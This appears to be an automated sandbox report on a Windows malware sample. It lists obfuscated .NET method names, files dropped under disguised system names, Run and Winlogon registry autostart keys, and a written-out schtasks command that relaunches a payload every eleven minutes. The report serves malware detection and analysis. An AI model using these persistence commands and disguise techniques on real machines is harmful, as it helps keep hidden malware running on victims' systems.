Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, sXTrsGmwW92UGD5gicY.cs	High entropy of concatenated method names: 'eAgmIik6LX', 'S5JmTY5X7g', 'Enx92dtyJT0KMP3e6AEW', 'wGk9mTtykwqB9591uZoM', 'Ra2g73tyoqUhCtpITUtQ', 'cZA7gQtyXffKHrM8ZoGp', 'S9KOW5tymuiUHf4amv2M', 'KBKjhmtyy2PnM1UnsGyo', 'KKsmg7MEqi', 'hNuPmNty8Gr1JQPZkdNn'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, zKTDRCt9nErasjH2ZmO.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'okst3t7ictQ', 'zeitItADZg9', 'aWc2R4tPL9h3CpU8LkSU', 'LOyIBftPIpsX0Ile2KC6', 'YvMS25tPTyn15JWUTdhl', 'D7yA6ItPd3ktJq91X5tx'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, rNIdGAq4L2UgZ0XbZ4O.cs	High entropy of concatenated method names: 'IpoqQHdT7x', 'Jh4qzQhh6E', 'BQ0q1Yh76K', 'lmMqFMKNxJ', 'PBsqEuKFhd', 'DgeqaNvf6p', 'PP0qZBiYgA', 'HGmq8h0UiR', 'D9Jq0lPY2J', 'pRtqReISyv'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, IDjjuwk6Im7GfnDOuIL.cs	High entropy of concatenated method names: 'cadkhaoWxm', 'Uc1kljX1b0', 'dyBkNrAjgo', 'T8fknIuaP8', 'Dispose', 'BSedT7tyq688EdenZAGU', 'Md7DYKtySkXEDYk5CUVw', 'Vw39XXtyGmKQjMiK9g2m', 'BL4XaatyP5NuibYFPGS5', 'ClJk3jty5ZtKowbIgutk'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, RF1xuyX6lnZw3QJnOaV.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'vgoXhVevLj', 'MFu0yetk0gX8V59xEwwy', 'GCqmp1tkRgHMfDOxIh2H', 'Cg4yXJtko7nlB9LXlMNX', 'Uo1ShCtkXJ9sxxPtesfk', 'dn8sGxtkJh1UfKQo81ee', 'UrTUistkkpy0lRPrBRJc'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, UxtZZaWg65indDOArkM.cs	High entropy of concatenated method names: 'sPPWIGG54t', 'GMJWTpw694', 'U1nWdNCmwY', 'GgJWvAOZDx', 'Ce3W3gZ1Ir', 'hvjWW2MkwA', 'cYkWi0ESp3', 'O2ZWCysTXx', 'MEKWblywvQ', 'VGjWewZ5uB'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, FCwMZtdVNXyZOCatCiw.cs	High entropy of concatenated method names: 'ak4d6MVx43', 'lgsRkOtx1hQbsPb3DFU7', 'mUj37ptx4JqmGU13EXHy', 'me669NtxYQjriopRZtH8', 'lJld2FtxFM8ia2yNMVxB', 'oY3x38txEuq4k5EJ54nn', 'E94', 'P9X', 'vmethod_0', 'UAVtI2eUnXf'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, tdbmM656f4BHMBYHiWP.cs	High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, uoV4aqkegAAcjxVnSBX.cs	High entropy of concatenated method names: 'PGikOlkcnG', 'N3ak7pmIp3', 'Tn8kA0d0Lx', 'JbokHxf9TZ', 'BcFksYyJlE', 'PE5kVRWfrO', 'UDkkSriaQR', 'Y2VkG6iFI8', 'Dispose', 'rt3oOWty2NRldbYjQOTk'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, sOj7FWgTfcFcKp49eDv.cs	High entropy of concatenated method names: 'n5Ugvynh6S', 'TCmg3iuTLj', 'YNCgWHeDYY', 'sbsgimeFX8', 'bKjv4PtPO0hq56mEKB3x', 'rcf6jOtPu8htpO5wvwXr', 'Yn4r81tPUeyKuLeqAQBw', 'DhCiiZtPKBlHfJpVg4mQ', 'qKa7Z0tPMMs6OVZnabOS', 'TAWMcttPB3PkeG0sDnJ0'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, JREtCPg0XMJH2KZIFl1.cs	High entropy of concatenated method names: 'rjjLvY0M10', 'b92xvHt5trX8qBcqKJiF', 'WJJOmotPzvj94WTl5b2A', 'FpCqAAt5w44qmpi7yOkc', 'n3Putkt5glTuAywwirXy', 'a3HQ2wt5L42ghgogsxOe', 'jRhLwljsBV', 'v4wLg7YmR7', 'ewcLLqu3vg', 'EI2LIm7Ca8'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, AJLTSApmvVrBXDSQh8k.cs	High entropy of concatenated method names: 'lDKpQ3E9Gg', 'OVyp9D7FaS', 'H9npzRLr3X', 'niEjwKl6OU', 'aPLjtEsT6b', 'gAojgrqT7w', 'hPDjL56ut3', 'wxDjInlOBV', 'xPKjTZR9Xo', 'uTljdFgF5g'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, N91CjYWuNl9al8h8lLv.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'VaGw9AtNFJe4KUFy1AMS', 'QGGNgstNEaAENSn1gjj6', 'QDUvAutNaeNi6cIqgjXp', 'LDtWO3uBrg'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, RrTxs4UHZFyMHteKtrc.cs	High entropy of concatenated method names: 'wb87e9lywo', 'nId7ulfiRJ', 'jtiihBtjwu6txyeX9w6f', 'R3ZxpOtp9wSl2kIlDFP9', 'nAbYfUtpzk6IL3O2HKlW', 'GYneYgtjtEe5x2wxMCHT', 'yDV6omtjgujLuLAN0YJO', 'uJV77Lbijo', 'zXqDwDtjdA4ZdPolwXqn', 'K2jIDEtjIUtNabllEjm5'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, SOi6AmtB7cXIqEKtoSg.cs	High entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'uYktvzDa1u3', 'zeitItADZg9', 'jeFFmotqstZUsBwYop5O', 'Aash62tqV5U2Twh62BhJ'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, lSSm003Awv6om8Nv1YS.cs	High entropy of concatenated method names: 'b1H3sVhLTR', 'bY7PTmtlFAnw5bE0pAMT', 'HVjVV5tlEPfmbpeDi0ZZ', 'KNJIYBtlaOMhKtYkFYvn', 'uPhxpxtlZZbNFf8cbmCT', 'QLayMPtl8pIvZVVT99Si', 'P6uMvktlYJ3SXouLm6D3', 'D0FL8ttl1rRB4EZ3qpWA'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, NLkOIg3q0RGygtBQREs.cs	High entropy of concatenated method names: 'xUT35dNuwI', 'j543fGf1SY', 'oTY36oTGjJ', 'x613xUtyG1', 'mAg3hkWWas', 'vXo3lLyIf9', 'Bs1X3ntlmCfgmfhrQlCm', 'aoWV8Gtly8bTI4rOk9ao', 'kWVpSwtlQuWw2DDXVYGJ', 'ULMiVltl9SR4QvI2Uxta'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, ShJbkX3E5jplXN6VU4D.cs	High entropy of concatenated method names: 'Rvt3kgo4ye', 'zUdVOutNMW4ph1Jw8nU8', 'ApoQpFtNOnY6mshwMXfi', 'xegXh2tNKcM3rVwJVG7h', 'f3CixDtNB3T4T97khSJ1', 'QrtwWOtN7augkvmxvMbR', 'P9X', 'vmethod_0', 'MwUtIq65Q5c', 'imethod_0'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, NrDWQNxrYf1sLkJjEic.cs	High entropy of concatenated method names: 'N3phutMvox', 'LE7R3Wt0yK8gVjl69KZr', 'ubxoQLt0QMfy9BW0Vrh7', 'bFTHHLt09c8e1iYJhg2t', 'kt5', 'KvExHxMhEC', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, tIlQNbGCYvq7Akrxv1p.cs	High entropy of concatenated method names: 'YfSGe072Zn', 'MIKGuFcUx6', 'dFTGUjAStc', 'y5XGOKnfji', 'PCHGKBMr2C', 'b50VUhtEM3dxViExc4k8', 'ujsFXGtEONIe0wB3A5Cs', 'Dd2wmitEKM4IypDNWDPL', 'PXO5MbtEBeQr3FkjI7g3', 'TSyCdKtE7Zr80YNAJc14'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, lZWQbHG63oKpoEbs3LZ.cs	High entropy of concatenated method names: 'method_0', 'KM3GhEAbtr', 'oKTGlowtGZ', 'vAmGNxWdNN', 'X6UGnQdJb9', 'YWVGc54NqI', 'PhuGDU476L', 'zl0ffZtEqiPPE3EGu1Qq', 'tSZQd2tES6Gn3IFVqhut', 'n3Oas6tEGF2krfoNpwTy'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, dfGbAF7DoPNI57K5jNe.cs	High entropy of concatenated method names: 'pon7EmkqtP', 'r4Y7aIoIRJ', 'prS7Z441Ks', 'PI3kNMtjq1N0TiEH468A', 'RnFKxctjPRKutXR82CGo', 'W2ZH59tjSKscyZ8sGdMi', 'P35hLetjG1y7yPbokwNl', 'SIh7jhvUg3', 'DTP74gHoyo', 'CEs7YrOivm'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, wbcja4g2kkICvSwdXEZ.cs	High entropy of concatenated method names: 'd8jgA1PHas', 'M53gHB3JMg', 'UDRm9GtPfeoowdULFMld', 'RND5HBtPPa0FTrHQq0S3', 'WLa3aptP5hocPbT8759P', 'bG8QgKtP6XG6J374nZEb', 'TWFAYOtPxYomZHJqtydo', 'qkeUPPtPhwu5IX4HYqKu', 'NnXF6atPlZvkqnuCdYjq'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, xlWC4uf9SYdXdhLORkQ.cs	High entropy of concatenated method names: 'Lsd6wEfQoD', 'fbt6tnRKKQ', 'Yd7', 'KVm6gmaxsm', 'y956LFavqe', 'Ewu6IxEoO5', 'FlY6TObq7S', 'zjwP1Mt0tuCyI0pNcyFb', 'RsEZsHt8zY5vnRb15ceC', 'qM5iGht0wflrWiy9cFYi'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, J8g0SKDWM0dWjWp4Has.cs	High entropy of concatenated method names: 'SnpDVU6cfJ', 'QHZXLotXGh8sVPhtrHKw', 'iE3ICftXqENejLcSBG1D', 'ab1VtYtXVhrZe3csqHAC', 'IWBd3HtXS0VShE0tg2gW', 'MnXpd3tXPUxHyGiR0G7b', 'IPy', 'method_0', 'method_1', 'method_2'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, oHrqJtIpudueyOMdA5V.cs	High entropy of concatenated method names: 'EVIIQlnBLY', 'CKqHqFt6dvGUxvHbgBHw', 'DkGu1Bt6vE6A1eVNpwIY', 'suClVrt6IP2D4tAEhJgj', 'miwnEVt6TF2X6SSMBE3v', 'vWfNC1t6CS6yHhLhvtFm', 'tyiX4qt6W92MZINAx9vM', 'V1rhMft6iNrtLkDin8OD', 'xDJn0qt6bnolA9hFM83i', 'JO6Td00KES'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, NyrhUCP9TNlRhGMT1Y5.cs	High entropy of concatenated method names: 'd3x5wl1jC3', 'YNr5tAiX2e', 'rJB5ghxbxL', 'fOi5LRSRWQ', 'gqG5IslcUF', 'R455Tgcs4s', 'B6TNsTta98Qf2wpO5HBI', 'B9Ai2gtayvLtYfgeJDZ3', 'glUsVstaQHTIDwHCiudZ', 'sgTJFPtazSUmIlSwA9Q6'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, uBZVKdnN0ELi6G0EJL0.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'V5BGyptoYF6gekfHVoRr', 'd9UjHotojWfBwnQpIKu6', 'OGhqp3to4kJCrF8Ys4uq'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, dNb48E3iGKSR1dwA0aF.cs	High entropy of concatenated method names: 'kre3bwKJc5', 'SnU3ej7grw', 'xG73uAh4XK', 'xI7X19tlVepEDJXvKney', 'bghYC6tlSkD7fr5EDfM6', 'wjh6whtlHKBOUlNjAmGZ', 'lO8f80tlssDYqDFwTlXm', 'RUWwMitlGOwYPDGw9Agg', 'XFIOgDtlqFiCV2o76OSM', 'nBSXq0tlPR7SuxqDj5wd'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, zeGPtCV1tvrrZBHEeW3.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'csdVEAjQKw', 'mr6VaRNFHS', 'Dispose', 'D31', 'wNK'
Source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, sb54FLIS6nohAbkC3wQ.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'ECot3LoFgpg', 'zeitItADZg9', 'PVJ5DRtfSSwaYPW8NB8L', 'HZCHyXtfGkTWJ5SGYOi6', 'jqi11otfqUqAX6PFxmPP'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\monitordll\componentreviewsavesSession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Source: C:\monitordll\componentreviewsavesSession.exe	File created: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe	Jump to dropped file
Source: C:\monitordll\componentreviewsavesSession.exe	File created: C:\Recovery\wmnXYZRZEK.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\monitordll\componentreviewsavesSession.exe	File created: C:\Users\user\Desktop\ufQLssLX.log	Jump to dropped file
Source: C:\Users\user\Desktop\Bootstrapper.exe	File created: C:\Users\user\Desktop\BootstrapperV1.23.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File created: C:\Users\user\Desktop\Bootstrapper.exe	Jump to dropped file
Source: C:\monitordll\componentreviewsavesSession.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	Jump to dropped file
Source: C:\monitordll\componentreviewsavesSession.exe	File created: C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe	Jump to dropped file
Source: C:\monitordll\componentreviewsavesSession.exe	File created: C:\ProgramData\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	File created: C:\monitordll\componentreviewsavesSession.exe	Jump to dropped file

Source: C:\monitordll\componentreviewsavesSession.exe

File created: C:\ProgramData\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Windows\System32\SecurityHealthSystray.exe

Jump to dropped file

Source: C:\monitordll\componentreviewsavesSession.exe

File created: C:\Users\user\Desktop\ufQLssLX.log

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\monitordll\componentreviewsavesSession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\monitordll\componentreviewsavesSession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\monitordll\componentreviewsavesSession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\monitordll\componentreviewsavesSession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\monitordll\componentreviewsavesSession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\monitordll\componentreviewsavesSession.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIHClient "C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe"
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIHClient "C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe"

Creates multiple autostart registry keys

Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIHClient
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run componentreviewsavesSession

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\monitordll\componentreviewsavesSession.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 11 /tr "'C:\Recovery\wmnXYZRZEK.exe'" /f

Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIHClient
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIHClient
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIHClient
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIHClient
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run componentreviewsavesSession
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run componentreviewsavesSession
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run componentreviewsavesSession
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run componentreviewsavesSession
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK
Source: C:\monitordll\componentreviewsavesSession.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK

Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
